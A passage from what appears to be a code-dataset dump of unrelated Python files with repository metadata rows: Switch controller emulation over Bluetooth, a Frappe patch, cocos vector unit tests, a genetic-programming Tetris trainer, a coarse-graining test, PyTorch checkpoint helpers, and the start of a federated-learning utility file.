elapsed_time = (timer_end - timer_start)
if self.slow_input_frequency:
# Check if we can switch out of slow frequency input
if self.input.exited_grip_order_menu:
self.slow_input_frequency = False
if elapsed_time < 1/15:
time.sleep(1/15 - elapsed_time)
else:
# Respond at 120Hz for Pro Controller
# or 60Hz for Joy-Cons.
# Sleep timers are compensated with the elapsed command
# processing time.
if self.controller_type == ControllerTypes.PRO_CONTROLLER:
if elapsed_time < 1/120:
time.sleep(1/120 - elapsed_time)
else:
if elapsed_time < 1/60:
time.sleep(1/60 - elapsed_time)
def save_connection(self, error, state=None):
while self.reconnect_counter < 2:
try:
self.logger.debug("Attempting to reconnect")
# Reinitialize the protocol
self.protocol = ControllerProtocol(
self.controller_type,
self.bt.address,
colour_body=self.colour_body,
colour_buttons=self.colour_buttons)
if self.lock:
self.lock.acquire()
try:
itr, ctrl = self.reconnect(self.switch_address)
return itr, ctrl
finally:
if self.lock:
self.lock.release()
except OSError:
self.reconnect_counter += 1
self.logger.exception(error)
time.sleep(0.5)
# If we can't reconnect, transition to attempting
# to connect to any Switch.
self.logger.debug("Connecting to any Switch")
self.reconnect_counter = 0
# Reinitialize the protocol
self.protocol = ControllerProtocol(
self.controller_type,
self.bt.address,
colour_body=self.colour_body,
colour_buttons=self.colour_buttons)
self.input.reassign_protocol(self.protocol)
# Since we were forced to attempt a reconnection
# we need to press the L/SL and R/SR buttons before
# we can proceed with any input.
if self.controller_type == ControllerTypes.PRO_CONTROLLER:
self.input.current_macro_commands = "L R 0.0s".strip(" ").split(" ")
elif self.controller_type == ControllerTypes.JOYCON_L:
self.input.current_macro_commands = "JCL_SL JCL_SR 0.0s".strip(" ").split(" ")
elif self.controller_type == ControllerTypes.JOYCON_R:
self.input.current_macro_commands = "JCR_SL JCR_SR 0.0s".strip(" ").split(" ")
if self.lock:
self.lock.acquire()
try:
itr, ctrl = self.connect()
finally:
if self.lock:
self.lock.release()
self.state["state"] = "connected"
self.switch_address = itr.getsockname()[0]
return itr, ctrl
def connect(self):
"""Configures as a specified controller, pairs with a Nintendo Switch,
and creates/accepts sockets for communication with the Switch.
"""
self.state["state"] = "connecting"
# Creating control and interrupt sockets
s_ctrl = socket.socket(
family=socket.AF_BLUETOOTH,
type=socket.SOCK_SEQPACKET,
proto=socket.BTPROTO_L2CAP)
s_itr = socket.socket(
family=socket.AF_BLUETOOTH,
type=socket.SOCK_SEQPACKET,
proto=socket.BTPROTO_L2CAP)
# Setting up HID interrupt/control sockets
try:
s_ctrl.bind((self.bt.address, 17))
s_itr.bind((self.bt.address, 19))
except OSError:
s_ctrl.bind((socket.BDADDR_ANY, 17))
s_itr.bind((socket.BDADDR_ANY, 19))
s_itr.listen(1)
s_ctrl.listen(1)
self.bt.set_discoverable(True)
ctrl, ctrl_address = s_ctrl.accept()
itr, itr_address = s_itr.accept()
# Send an empty input report to the Switch to prompt a reply
self.protocol.process_commands(None)
msg = self.protocol.get_report()
itr.sendall(msg)
# Setting interrupt connection as non-blocking.
# In this case, non-blocking means it throws a "BlockingIOError"
# for sending and receiving, instead of blocking.
fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK)
# Mainloop
while True:
# Attempt to get output from Switch
try:
reply = itr.recv(50)
if self.logger_level <= logging.DEBUG and len(reply) > 40:
self.logger.debug(format_msg_switch(reply))
except BlockingIOError:
reply = None
self.protocol.process_commands(reply)
msg = self.protocol.get_report()
if self.logger_level <= logging.DEBUG and reply:
self.logger.debug(format_msg_controller(msg))
try:
itr.sendall(msg)
except BlockingIOError:
continue
# Exit pairing loop when player lights have been set and
# vibration has been enabled
if (reply and len(reply) > 45 and
self.protocol.vibration_enabled and self.protocol.player_number):
break
# Switch responds to packets slower during pairing
# Pairing cycle responds optimally on a 15Hz loop
time.sleep(1/15)
self.slow_input_frequency = True
self.input.exited_grip_order_menu = False
return itr, ctrl
def reconnect(self, reconnect_address):
"""Attempts to reconnect with a Switch at the given address.
:param reconnect_address: The Bluetooth MAC address of the Switch
:type reconnect_address: string or list
"""
def recreate_sockets():
# Creating control and interrupt sockets
ctrl = socket.socket(
family=socket.AF_BLUETOOTH,
type=socket.SOCK_SEQPACKET,
proto=socket.BTPROTO_L2CAP)
itr = socket.socket(
family=socket.AF_BLUETOOTH,
type=socket.SOCK_SEQPACKET,
proto=socket.BTPROTO_L2CAP)
return itr, ctrl
self.state["state"] = "reconnecting"
itr = None
ctrl = None
if type(reconnect_address) == list:
for address in reconnect_address:
test_itr, test_ctrl = recreate_sockets()
try:
# Setting up HID interrupt/control sockets
test_ctrl.connect((address, 17))
test_itr.connect((address, 19))
itr = test_itr
ctrl = test_ctrl
except OSError:
test_itr.close()
test_ctrl.close()
pass
elif type(reconnect_address) == str:
test_itr, test_ctrl = recreate_sockets()
# Setting up HID interrupt/control sockets
test_ctrl.connect((reconnect_address, 17))
test_itr.connect((reconnect_address, 19))
itr = test_itr
ctrl = test_ctrl
if not itr and not ctrl:
raise OSError("Unable to reconnect to sockets at the given address(es)",
reconnect_address)
fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK)
# Send an empty input report to the Switch to prompt a reply
self.protocol.process_commands(None)
msg = self.protocol.get_report()
itr.sendall(msg)
# Setting interrupt connection as non-blocking
# In this case, non-blocking means it throws a "BlockingIOError"
# for sending and receiving, instead of blocking
fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK)
return itr, ctrl
| 34.415789 | 90 | 0.558878 |
3adefdd3fa592b7c580b21e49f739074251c1d6b | 391 | py | Python | mfi_customization/mfi/patch/set_first_responded_on_issue.py | anuradha-88/mfi_customization | eb19ed43d0178b461f1d9914d2f7b6b55c9d030c | [
"MIT"
] | null | null | null | mfi_customization/mfi/patch/set_first_responded_on_issue.py | anuradha-88/mfi_customization | eb19ed43d0178b461f1d9914d2f7b6b55c9d030c | [
"MIT"
] | null | null | null | mfi_customization/mfi/patch/set_first_responded_on_issue.py | anuradha-88/mfi_customization | eb19ed43d0178b461f1d9914d2f7b6b55c9d030c | [
"MIT"
] | null | null | null | import frappe
from datetime import datetime
# bench execute mfi_customization.mfi.patch.set_first_responded_on_issue.execute
def execute():
for d in frappe.get_all("Issue"):
for tk in frappe.get_all("Task",{"issue": d.name}, ['attended_date_time', 'status']):
if tk.attended_date_time:
frappe.db.set_value("Issue", {"name": d.name},"first_responded_on",tk.attended_date_time)
| 35.545455 | 93 | 0.749361 |
3adf36991cec5979dbe14a96fcb6614f4fd9f191 | 12,144 | py | Python | team_9/cocos/utest/test_euclid.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | 1 | 2019-09-15T18:59:49.000Z | 2019-09-15T18:59:49.000Z | team_9/cocos/utest/test_euclid.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | team_9/cocos/utest/test_euclid.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division, print_function, unicode_literals
import cocos.euclid as eu
import unittest
import copy
try:
import cPickle as pickle
except Exception:
import pickle
import io
class Test_Vector2(unittest.TestCase):
def test_instantiate(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % xy)
def test_instantiate_default(self):
v2 = eu.Vector2()
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % (0, 0))
def test_copy(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
copied = v2.__copy__()
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
def test_deepcopy(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
copied = copy.deepcopy(v2)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
# they need __getstate__ and __setstate__ implemented
def test_pickle_lower_protocols(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
s = pickle.dumps(v2, 0)
copied = pickle.loads(s)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
s = pickle.dumps(v2, 1)
copied = pickle.loads(s)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
# don't need __getstate__ / __setstate__ implemented
def test_pickle_protocol_2(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
s = pickle.dumps(v2, 2)
copied = pickle.loads(s)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
def test_eq_v2(self):
xy = (1.0, 2.0)
self.assertTrue(eu.Vector2(*xy), eu.Vector2(*xy))
other = (1.0, 3.0)
self.assertTrue( eu.Vector2(*xy) != eu.Vector2(*other))
def test_eq_tuple(self):
xy = (1.0, 2.0)
self.assertEqual(eu.Vector2(*xy), xy)
other = (1.0, 2.0, 3.0)
self.assertRaises( AssertionError,
lambda a, b: a == b, eu.Vector2(*xy), other)
other = 1.0
self.assertRaises( AssertionError,
lambda a, b: a == b, eu.Vector2(*xy), other)
def test_len(self):
xy = (1.0, 2.0)
self.assertEqual(len(eu.Vector2(*xy)), 2)
def test_index_access__get(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
self.assertEqual( v2[0], xy[0])
self.assertEqual(v2[1], xy[1])
self.assertRaises(IndexError,
lambda a: v2[a], 2)
def test_index_access__set(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
v2[0] = 7.0
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % (7.0, 2.0))
v2[1] = 8.0
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % (7.0, 8.0))
def f():
v2[2] = 9.0
self.assertRaises(IndexError, f)
def test_iter(self):
xy = [1.0, 2.0]
v2 = eu.Vector2(*xy)
sequence = [e for e in v2]
self.assertEqual(sequence, xy)
def test_swizzle_get(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
self.assertEqual(v2.x, xy[0])
self.assertEqual(v2.y, xy[1])
self.assertEqual(v2.xy, xy)
self.assertEqual(v2.yx, (xy[1], xy[0]))
exception = None
try:
v2.z == 11.0
except Exception as a:
exception = a
assert isinstance(exception, AttributeError)
def test_sub__v2_v2(self):
a = (3.0, 7.0)
b = (1.0, 2.0)
va = eu.Vector2(*a)
vb = eu.Vector2(*b)
self.assertEqual(va-vb, eu.Vector2(2.0, 5.0))
def test_sub__v2_t2(self):
a = (3.0, 7.0)
b = (1.0, 2.0)
va = eu.Vector2(*a)
vb = eu.Vector2(*b)
self.assertEqual(va-b, eu.Vector2(2.0, 5.0))
def test_rsub__t2_v2(self):
a = (3.0, 7.0)
b = (1.0, 2.0)
va = eu.Vector2(*a)
vb = eu.Vector2(*b)
self.assertEqual(a-vb, eu.Vector2(2.0, 5.0))
# in py3 or py2 with 'from __future__ import division'
# else the integer division is used, as in old euclid.py
def test_default_div(self):
xy = (4, 7)
v2 = eu.Vector2(*xy)
c = v2 / 3
self.assertTrue(c.x == 4.0 / 3, c.y == 7.0 / 3)
def test_integer_division(self):
xy = (4, 7)
v2 = eu.Vector2(*xy)
c = v2 // 3
self.assertTrue(c.x == 4 // 3, c.y == 7 // 3)
def test_add(self):
a = (3.0, 7.0)
b = (1.0, 2.0)
va = eu.Vector2(*a)
vb = eu.Vector2(*b)
self.assertTrue(isinstance(va+vb, eu.Vector2))
self.assertEqual(repr(va+vb), 'Vector2(%.2f, %.2f)' % (4.0, 9.0))
c = (11.0, 17.0)
pc = eu.Point2(*c)
d = (13.0, 23.0)
pd = eu.Point2(*d)
self.assertTrue(isinstance(va+pc, eu.Point2))
self.assertTrue(isinstance(pc+pd, eu.Vector2))
self.assertTrue(isinstance(va + b, eu.Vector2))
self.assertEqual(va + vb, va + b)
def test_inplace_add(self):
a = (3.0, 7.0)
b = (1.0, 2.0)
va = eu.Vector2(*a)
vb = eu.Vector2(*b)
va += b
self.assertEqual((va.x, va.y) , (4.0, 9.0))
va = eu.Vector2(*a)
va += b
self.assertEqual((va.x, va.y) , (4.0, 9.0))
class Test_Vector3(unittest.TestCase):
def test_instantiate(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % xyz)
def test_instantiate_default(self):
v3 = eu.Vector3()
self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (0, 0, 0))
def test_copy(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
copied = v3.__copy__()
self.assertEqual(repr(v3), repr(copied))
self.assertFalse(copied is v3)
def test_deepcopy(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
copied = copy.deepcopy(v3)
self.assertEqual(repr(v3), repr(copied))
self.assertFalse(copied is v3)
# they need __getstate__ and __setstate__ implemented
def test_pickle_lower_protocols(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
s = pickle.dumps(v3, 0)
copied = pickle.loads(s)
self.assertEqual(repr(v3), repr(copied))
self.assertFalse(copied is v3)
self.assertFalse(hasattr(copied, '__dict__'))
s = pickle.dumps(v3, 1)
copied = pickle.loads(s)
self.assertEqual(repr(v3), repr(copied))
self.assertFalse(copied is v3)
self.assertFalse(hasattr(copied, '__dict__'))
# no need for __getstate__ and __setstate__
def test_pickle_protocol_2(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
s = pickle.dumps(v3, 2)
copied = pickle.loads(s)
self.assertEqual(repr(v3), repr(copied))
self.assertFalse(copied is v3)
def test_eq_v3(self):
xyz = (1.0, 2.0, 3.0)
self.assertTrue(eu.Vector3(*xyz), eu.Vector3(*xyz))
other = (1.0, 3.0, 7.0)
self.assertTrue( eu.Vector3(*xyz) != eu.Vector3(*other))
def test_eq_tuple(self):
xyz = (1.0, 2.0, 3.0)
self.assertEqual(eu.Vector3(*xyz), xyz)
other = (1.0, 2.0, 3.0, 4.0)
self.assertRaises( AssertionError,
lambda a, b: a == b, eu.Vector3(*xyz), other)
other = 1.0
self.assertRaises( AssertionError,
lambda a, b: a == b, eu.Vector3(*xyz), other)
def test_len(self):
xyz = (1.0, 2.0, 3.0)
self.assertEqual(len(eu.Vector3(*xyz)), 3)
def test_index_access__get(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
self.assertEqual( v3[0], xyz[0])
self.assertEqual(v3[1], xyz[1])
self.assertEqual(v3[2], xyz[2])
self.assertRaises(IndexError,
lambda a: v3[a], 3)
def test_index_access__set(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
v3[0] = 7.0
self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (7.0, 2.0, 3.0))
v3[1] = 8.0
self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (7.0, 8.0, 3.0))
v3[2] = 9.0
self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (7.0, 8.0, 9.0))
def f():
v3[3] = 9.0
self.assertRaises(IndexError, f)
def test_iter(self):
xyz = [1.0, 2.0, 3.0]
v3 = eu.Vector3(*xyz)
sequence = [e for e in v3]
self.assertEqual(sequence, xyz)
def test_swizzle_get(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Vector3(*xyz)
self.assertEqual(v3.x, xyz[0])
self.assertEqual(v3.y, xyz[1])
self.assertEqual(v3.z, xyz[2])
self.assertEqual(v3.xy, (xyz[0], xyz[1]))
self.assertEqual(v3.xz, (xyz[0], xyz[2]))
self.assertEqual(v3.yz, (xyz[1], xyz[2]))
self.assertEqual(v3.yx, (xyz[1], xyz[0]))
self.assertEqual(v3.zx, (xyz[2], xyz[0]))
self.assertEqual(v3.zy, (xyz[2], xyz[1]))
self.assertEqual(v3.xyz, xyz)
self.assertEqual(v3.xzy, (xyz[0], xyz[2], xyz[1]) )
self.assertEqual(v3.zyx, (xyz[2], xyz[1], xyz[0]) )
self.assertEqual(v3.zxy, (xyz[2], xyz[0], xyz[1]) )
self.assertEqual(v3.yxz, (xyz[1], xyz[0], xyz[2]) )
self.assertEqual(v3.yzx, (xyz[1], xyz[2], xyz[0]) )
exception = None
try:
v3.u == 11.0
except Exception as a:
exception = a
assert isinstance(exception, AttributeError)
def test_sub__v3_v3(self):
a = (3.0, 7.0, 9.0)
b = (1.0, 2.0, 3.0)
va = eu.Vector3(*a)
vb = eu.Vector3(*b)
self.assertEqual(va-vb, eu.Vector3(2.0, 5.0, 6.0))
def test_sub__v3_t3(self):
a = (3.0, 7.0, 9.0)
b = (1.0, 2.0, 3.0)
va = eu.Vector3(*a)
vb = eu.Vector3(*b)
self.assertEqual(va-b, eu.Vector3(2.0, 5.0, 6.0))
def test_rsub__t3_v3(self):
a = (3.0, 7.0, 9.0)
b = (1.0, 2.0, 3.0)
va = eu.Vector3(*a)
vb = eu.Vector3(*b)
self.assertEqual(a-vb, eu.Vector3(2.0, 5.0, 6.0))
class Test_Point2(unittest.TestCase):
def test_swizzle_get(self):
xy = (1.0, 2.0)
v2 = eu.Point2(*xy)
self.assertEqual(v2.x, xy[0])
self.assertEqual(v2.y, xy[1])
self.assertEqual(v2.xy, xy)
self.assertEqual(v2.yx, (xy[1], xy[0]))
exception = None
try:
v2.z == 11.0
except Exception as a:
exception = a
assert isinstance(exception, AttributeError)
class Test_Point3(unittest.TestCase):
def test_swizzle_get(self):
xyz = (1.0, 2.0, 3.0)
v3 = eu.Point3(*xyz)
self.assertEqual(v3.x, xyz[0])
self.assertEqual(v3.y, xyz[1])
self.assertEqual(v3.z, xyz[2])
self.assertEqual(v3.xy, (xyz[0], xyz[1]))
self.assertEqual(v3.xz, (xyz[0], xyz[2]))
self.assertEqual(v3.yz, (xyz[1], xyz[2]))
self.assertEqual(v3.yx, (xyz[1], xyz[0]))
self.assertEqual(v3.zx, (xyz[2], xyz[0]))
self.assertEqual(v3.zy, (xyz[2], xyz[1]))
self.assertEqual(v3.xyz, xyz)
self.assertEqual(v3.xzy, (xyz[0], xyz[2], xyz[1]) )
self.assertEqual(v3.zyx, (xyz[2], xyz[1], xyz[0]) )
self.assertEqual(v3.zxy, (xyz[2], xyz[0], xyz[1]) )
self.assertEqual(v3.yxz, (xyz[1], xyz[0], xyz[2]) )
self.assertEqual(v3.yzx, (xyz[1], xyz[2], xyz[0]) )
if __name__ == '__main__':
unittest.main()
| 30.512563 | 81 | 0.525115 |
3adf530cc79f1ef10e5ff6f32271340c43c7203b | 3,769 | py | Python | main.py | aHeraud/cgp-tetris | a3483b279bf0bc53edcb3a871873dd576a33c01c | [
"MIT"
] | null | null | null | main.py | aHeraud/cgp-tetris | a3483b279bf0bc53edcb3a871873dd576a33c01c | [
"MIT"
] | null | null | null | main.py | aHeraud/cgp-tetris | a3483b279bf0bc53edcb3a871873dd576a33c01c | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
import sys
from multiprocessing import Pool
from timeit import default_timer as timer
from config import Config
from cgp.functionset import FunctionSet
from cgp.genome import Genome
import numpy as np
import numpy.random
from random import randint
from tetris_learning_environment import Environment
from tetris_learning_environment import Key
import tetris_learning_environment.gym as gym
from cgp import functional_graph
import signal
import time
FRAME_SKIP = 120
DOWNSAMPLE = 8
PROCESSES = 3
CONFIG = Config()
FUNCTION_SET = FunctionSet()
def worker_init(rom_path):
global env
env = gym.TetrisEnvironment(rom_path, frame_skip=FRAME_SKIP)
def run_episode(genome):
pixels = env.reset()
done = False
rewardSum = 0
while not done:
grayscale = np.sum(pixels, axis = 2) / 3.0 / 255.0 # constrained to range [0, 1]
#rPixels = pixels[::DOWNSAMPLE,::DOWNSAMPLE,0] +
#gPixels = pixels[::DOWNSAMPLE,::DOWNSAMPLE,1] / 255.0
#bPixels = pixels[::DOWNSAMPLE,::DOWNSAMPLE,2] / 255.0
output = genome.evaluate(grayscale)
action = np.argmax(output)
pixels, reward, done, info = env.step(action)
rewardSum += reward + 1
return (genome, rewardSum)
def render(env, genome):
pixels = env.reset()
import pygame
pygame.init()
size = (pixels.shape[1], pixels.shape[0])
display = pygame.display.set_mode(size)
pygame.display.set_caption('Tetris')
carryOn = True
clock = pygame.time.Clock()
done = False
while not done and carryOn:
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
carryOn = False
pygame.surfarray.blit_array(display, np.flip(np.rot90(pixels), axis=0))
pygame.display.flip()
rPixels = pixels[::DOWNSAMPLE,::DOWNSAMPLE,0] / 255.0
gPixels = pixels[::DOWNSAMPLE,::DOWNSAMPLE,1] / 255.0
bPixels = pixels[::DOWNSAMPLE,::DOWNSAMPLE,2] / 255.0
output = genome.evaluate(rPixels, gPixels, bPixels)
action = np.argmax(output)
pixels, reward, done, info = env.step(action)
clock.tick(60)
pygame.quit()
def main():
if len(sys.argv) < 2:
print("Missing rom path argument.")
return
tetris_rom_path = sys.argv[1]
bestScore = 0
global elite
elite = Genome(CONFIG, FUNCTION_SET)
print('Starting CGP for ' + str(CONFIG.generations) + ' generations...')
with Pool(processes=PROCESSES, initializer=worker_init, initargs=(tetris_rom_path,)) as pool:
for generation in range(CONFIG.generations):
start = timer()
children = [elite.get_child() for _ in range(CONFIG.childrenPerGeneration)]
results = [pool.apply_async(run_episode, args=(child,)) for child in children]
results = [result.get() for result in results]
for (genome, score) in results:
if score >= bestScore:
bestScore = score
elite = genome
elite.save_to_file('elite.out')
end = timer()
timeElapsed = end - start
estimatedTimeSec = timeElapsed * (CONFIG.generations + 1 - generation)
estimatedTimeMin = estimatedTimeSec / 60.0
print('Generation ' + str(generation + 1) + ' of ' + str(CONFIG.generations) + ' complete, current best score = ', bestScore)
print('Est. minutes remaining: ' + str(estimatedTimeMin))
print("FINISHED")
print('Best Score: ', bestScore)
env = gym.TetrisEnvironment(tetris_rom_path, frame_skip=FRAME_SKIP)
while True:
render(env, elite)
if __name__ == '__main__':
main()
| 30.395161 | 137 | 0.644733 |
3ae00d3abfc861f7559fd9d0fd444be28cadc9c5 | 3,175 | py | Python | test/molecular_map_test/single_protein_explicit_mapping/test_single_protein_explicit_mapping.py | fieryd/cgmap | 8b09cf1392d22be4f735d3259ee9d624f3e45210 | [
"Apache-2.0"
] | 5 | 2018-03-05T07:10:09.000Z | 2019-09-11T19:33:56.000Z | test/molecular_map_test/single_protein_explicit_mapping/test_single_protein_explicit_mapping.py | fieryd/cgmap | 8b09cf1392d22be4f735d3259ee9d624f3e45210 | [
"Apache-2.0"
] | 3 | 2017-05-02T21:47:38.000Z | 2020-07-16T20:12:19.000Z | test/molecular_map_test/single_protein_explicit_mapping/test_single_protein_explicit_mapping.py | fieryd/cgmap | 8b09cf1392d22be4f735d3259ee9d624f3e45210 | [
"Apache-2.0"
] | 4 | 2017-09-18T20:02:33.000Z | 2021-11-01T15:51:51.000Z | #!/usr/bin/env python2
import sys
sys.path.append('../../../src/')
import cgmap as cg
import mdtraj as md
import md_check as check
############################### config #####################################
input_traj = "protein.trr"
input_top = "protein.pdb"
output_traj = "protein.trr"
output_top = "protein.pdb"
reference_traj = "protein.trr"
reference_top = "protein.pdb"
output_dir ='./output/'
input_dir ='./input/'
reference_dir ='./reference/'
############################### run ########################################
### pull in trajectories
trj = md.load(input_dir + input_traj,top=input_dir + input_top)
### define mapping based on knowledge of topology
### in this instance, map every residue into a single site
for a in trj.top.atoms: a.mass = a.element.mass
for a in trj.top.atoms: a.charge = 0
# first residue is SER148 (zero index'd)
name_lists = []
label_lists = []
molecule_types = []
resREF = 148
istart = 0
iend = 0
iname = "SER"
molnum = 0
maxSize = len(list(trj.top.atoms))
stopFlag = False
tempMol = []
tempCGL = []
name_lists_key = []
for i, a in enumerate(trj.top.atoms) :
resNAME = str(a.residue)[0:3]
resNUM = int(str(a.residue)[3:6])
aINDEX = a.index
if resNAME not in name_lists_key :
name_lists_key.append(resNAME)
if (resNUM != resREF) :
#first append name_lists and label
iend = aINDEX - 1
tempMol.append("index %d to %d" % (istart, iend))
tempCGL.append(iname)
#then update things for next residue
iname = resNAME
istart = aINDEX
if resNUM < resREF :
#stopFlag = True
molecule_types.append(int(molnum))
name_lists.append(tempMol)
label_lists.append(tempCGL)
tempMol = []
tempCGL = []
molnum += 1
resREF = resNUM
# special case if last item
if (i == (maxSize-1)) :
iend = aINDEX
tempMol.append("index %d to %d" % (istart, iend))
tempCGL.append(iname)
molecule_types.append(int(molnum))
name_lists.append(tempMol)
label_lists.append(tempCGL)
#actual map command
print name_lists
print label_lists
print molecule_types
print "Lengths of all three lists should be equivalent: %d = %d = %d" % (len(name_lists), len(label_lists), len(molecule_types))
cg_trj = cg.map_unfiltered_molecules( trj = trj,
selection_list = name_lists,
bead_label_list = label_lists,
molecule_types = molecule_types,
mapping_function = "com")
cg_trj.save(output_dir + output_traj)
cg_trj[0].save(output_dir + output_top)
############################### check results ###############################
# reloading results from disk.
cg_traj = cg_trj.load(output_dir + output_traj,top=output_dir + output_top)
ref_cg_traj = cg_trj.load(reference_dir + reference_traj,
top=reference_dir + reference_top)
result=check.md_content_equality(cg_traj,ref_cg_traj)
sys.exit(check.check_result_to_exitval(result))
| 28.097345 | 128 | 0.589606 |
3ae33afc12f8987d0c85ee05a95ac1ec3a4be0c6 | 3,726 | py | Python | image_classifier/model_lib.py | JMarcan/computer_vision_perception | a5aa7bfb316e7b45596d8c5916638f5ce2b6d654 | [
"MIT"
] | null | null | null | image_classifier/model_lib.py | JMarcan/computer_vision_perception | a5aa7bfb316e7b45596d8c5916638f5ce2b6d654 | [
"MIT"
] | null | null | null | image_classifier/model_lib.py | JMarcan/computer_vision_perception | a5aa7bfb316e7b45596d8c5916638f5ce2b6d654 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Function that loads a checkpoint and rebuilds the model
import torch
from torch import nn
from collections import OrderedDict
from torchvision import datasets, transforms, models
def save_checkpoint(model, checkpoint_path, output_categories):
'''
Save the trained deep learning model
Args:
model: trained deep learning model to be saved
checkpoint_path(str): file path where model will be saved
output_categories(int): number of output categories recognized by the model
Returns:
None
'''
model.cpu()
torch.save({'arch': 'vgg16',
'state_dict': model.state_dict(),
'class_to_idx': model.class_to_idx,
'output_categories': output_categories
},checkpoint_path)
def load_checkpoint(checkpoint_path, device='cuda'):
'''
Loads trained deep learning model
Args:
checkpoint_path(str): file path where model will be saved
Returns:
model: loaded deep learning model
'''
check = torch.load(checkpoint_path, map_location=device)
if check['arch'] == 'vgg16':
model = models.vgg16(pretrained = True)
elif check['arch'] == 'vgg13':
model = models.vgg13(pretrained = True)
else:
print("Error: LoadCheckpoint - Model not recognized")
return 0
output_categories = 2
try:
if check['output_categories'] >= 2:
output_categories = check['output_categories']
else:
print("Error: LoadCheckpoint - Saved model output categories has invalid value ({0}). Value needs to be 2 or higher.".format(check['output_categories']))
return 0
except Exception as e: # when ['output_categories'] is not part of save model
print("Error: LoadCheckpoint - Saved model does not contain information about output categories: {0}".format(e))
return 0
for param in model.parameters():
param.requires_grad = False
model.class_to_idx = check['class_to_idx']
model.classifier = load_classifier(model, output_categories)
model.load_state_dict(check['state_dict'])
return model
def load_classifier(model, output_categories):
'''
Loads the classifier that we will train
Args:
model: deep learning model for which we create the classifier
output_categories(int): number of output categories
recognized by the model
Returns:
classifier: loaded classifier for a given model
'''
'''
# VGG16 classifier structure:
(classifier): Sequential(
(0): Linear(in_features=25088, out_features=4096, bias=True)
(1): ReLU(inplace)
(2): Dropout(p=0.5)
(3): Linear(in_features=4096, out_features=4096, bias=True)
(4): ReLU(inplace)
(5): Dropout(p=0.5)
(6): Linear(in_features=4096, out_features=1000, bias=True)
'''
#Classifier parameters
classifier_input = model.classifier[0].in_features #input layer of vgg16- has 25088
classifier_hidden_units = 4096 # 4096 default model value
classifier = nn.Sequential(
nn.Linear(classifier_input, classifier_hidden_units, bias=True),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(classifier_hidden_units, output_categories),
nn.LogSoftmax(dim=1)
# Log softmax activation function ensures that sum of all output probabilities is 1 \
# - With that we know the confidence the model has for a given class between 0-100%
)
return classifier
| 31.846154 | 165 | 0.630972 |
3ae4b2634727a7a3c18f2473fe0c51212182326b | 7,689 | py | Python | pytorch/utils/utils.py | XinyiYS/CollaborativeFairFederatedLearning | 1372f74230b366a41243f809ce0fc15586cd40fe | [
"MIT"
] | 25 | 2020-07-29T03:46:12.000Z | 2022-03-23T07:15:53.000Z | pytorch/utils/utils.py | lingjuanlv/CollaborativeFairFederatedLearning | 1372f74230b366a41243f809ce0fc15586cd40fe | [
"MIT"
] | null | null | null | pytorch/utils/utils.py | lingjuanlv/CollaborativeFairFederatedLearning | 1372f74230b366a41243f809ce0fc15586cd40fe | [
"MIT"
] | 7 | 2020-09-15T19:06:27.000Z | 2022-02-22T06:51:52.000Z | import copy
import torch
from torch import nn
from torch.utils.data import DataLoader
from torchtext.data import Batch
def averge_models(models, device=None):
final_model = copy.deepcopy(models[0])
if device:
models = [model.to(device) for model in models]
final_model = final_model.to(device)
averaged_parameters = aggregate_gradient_updates([list(model.parameters()) for model in models], mode='mean')
for param, avg_param in zip(final_model.parameters(), averaged_parameters):
param.data = avg_param.data
return final_model
def compute_grad_update(old_model, new_model, device=None):
# maybe later to implement on selected layers/parameters
if device:
old_model, new_model = old_model.to(device), new_model.to(device)
return [(new_param.data - old_param.data) for old_param, new_param in zip(old_model.parameters(), new_model.parameters())]
def add_gradient_updates(grad_update_1, grad_update_2, weight = 1.0):
assert len(grad_update_1) == len(
